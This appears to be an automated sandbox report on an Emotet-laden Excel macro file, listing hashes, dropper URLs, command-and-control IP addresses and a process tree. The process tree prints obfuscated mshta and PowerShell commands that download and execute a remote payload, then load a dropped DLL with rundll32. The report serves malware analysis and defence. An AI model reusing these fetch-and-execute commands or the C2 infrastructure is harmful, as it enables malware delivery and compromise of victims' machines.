Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    20-01-2022 13:13

General

  • Target

    673603229988382.xlsm

  • Size

    115KB

  • MD5

    0f8a9bd847e673ccf5adb13ce6fe5979

  • SHA1

    c84e4613c708eb3ef981218e278149993a3ac3a2

  • SHA256

    7798bb812270c2c7736281585caab8c2f272c52405a7d2f9cf5da363192e9904

  • SHA512

    646db1fe7664f87c54e41c5fd99a082073a42bb9329b44e386045c53db2f0ae35e4a148279184e998cf637a366c57afda413054589456ecf9ae581fbd14a5647

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\673603229988382.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3180
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:224
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\system32\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:560
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3524
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1952
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1388
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:3672
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wbkygowrtxmo\vchpnxankopjvvw.lrh",KEgvOemxqil
                    8⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1808
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Wbkygowrtxmo\vchpnxankopjvvw.lrh",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3220
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 560 -s 1724
            4⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:3108
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
      1⤵
        PID:1432
      • C:\Windows\System32\WaaSMedicAgent.exe
        C:\Windows\System32\WaaSMedicAgent.exe b1d999a3d04dbe1f1b1903192a0878ed OCc6KrGzrkeGdk/2fP5osg.0.1.0.0.0
        1⤵
        • Modifies data under HKEY_USERS
        PID:3816
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k PrintWorkflow
        1⤵
          PID:3228
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 408 -p 560 -ip 560
          1⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          • Suspicious use of WriteProcessMemory
          PID:1636
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k wusvcs -p
          1⤵
            PID:1792

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1388-226-0x0000000000D40000-0x0000000000D68000-memory.dmp

            Filesize

            160KB

          • memory/3180-137-0x00007FFCC1470000-0x00007FFCC1480000-memory.dmp

            Filesize

            64KB

          • memory/3180-134-0x00007FFCC37B0000-0x00007FFCC37C0000-memory.dmp

            Filesize

            64KB

          • memory/3180-130-0x00007FFCC37B0000-0x00007FFCC37C0000-memory.dmp

            Filesize

            64KB

          • memory/3180-131-0x00007FFCC37B0000-0x00007FFCC37C0000-memory.dmp

            Filesize

            64KB

          • memory/3180-132-0x00007FFCC37B0000-0x00007FFCC37C0000-memory.dmp

            Filesize

            64KB

          • memory/3180-133-0x00007FFCC37B0000-0x00007FFCC37C0000-memory.dmp

            Filesize

            64KB

          • memory/3180-138-0x00007FFCC1470000-0x00007FFCC1480000-memory.dmp

            Filesize

            64KB

          • memory/3220-256-0x00000000058A0000-0x00000000058C8000-memory.dmp

            Filesize

            160KB

          • memory/3220-254-0x0000000005790000-0x00000000057B8000-memory.dmp

            Filesize

            160KB

          • memory/3220-260-0x0000000005AB0000-0x0000000005AD8000-memory.dmp

            Filesize

            160KB

          • memory/3220-252-0x00000000056B0000-0x00000000056D8000-memory.dmp

            Filesize

            160KB

          • memory/3220-250-0x0000000005650000-0x0000000005678000-memory.dmp

            Filesize

            160KB

          • memory/3220-248-0x0000000005570000-0x0000000005598000-memory.dmp

            Filesize

            160KB

          • memory/3220-246-0x0000000004DB0000-0x0000000004DD8000-memory.dmp

            Filesize

            160KB

          • memory/3220-258-0x00000000059D0000-0x00000000059F8000-memory.dmp

            Filesize

            160KB

          • memory/3524-220-0x000002ABC2110000-0x000002ABC2112000-memory.dmp

            Filesize

            8KB

          • memory/3524-231-0x000002ABC27E0000-0x000002ABC2856000-memory.dmp

            Filesize

            472KB

          • memory/3524-223-0x000002ABC2710000-0x000002ABC2754000-memory.dmp

            Filesize

            272KB

          • memory/3524-222-0x000002ABC2116000-0x000002ABC2118000-memory.dmp

            Filesize

            8KB

          • memory/3524-221-0x000002ABC2113000-0x000002ABC2115000-memory.dmp

            Filesize

            8KB

          • memory/3524-217-0x000002ABC20C0000-0x000002ABC20E2000-memory.dmp

            Filesize

            136KB

          • memory/3672-238-0x0000000005740000-0x0000000005768000-memory.dmp

            Filesize

            160KB

          • memory/3672-241-0x00000000058C0000-0x00000000058E8000-memory.dmp

            Filesize

            160KB

          • memory/3672-236-0x00000000056E0000-0x0000000005708000-memory.dmp

            Filesize

            160KB

          • memory/3672-234-0x00000000055B0000-0x00000000055D8000-memory.dmp

            Filesize

            160KB

          • memory/3672-232-0x00000000054D0000-0x00000000054F8000-memory.dmp

            Filesize

            160KB

          • memory/3672-229-0x0000000004F20000-0x0000000004F48000-memory.dmp

            Filesize

            160KB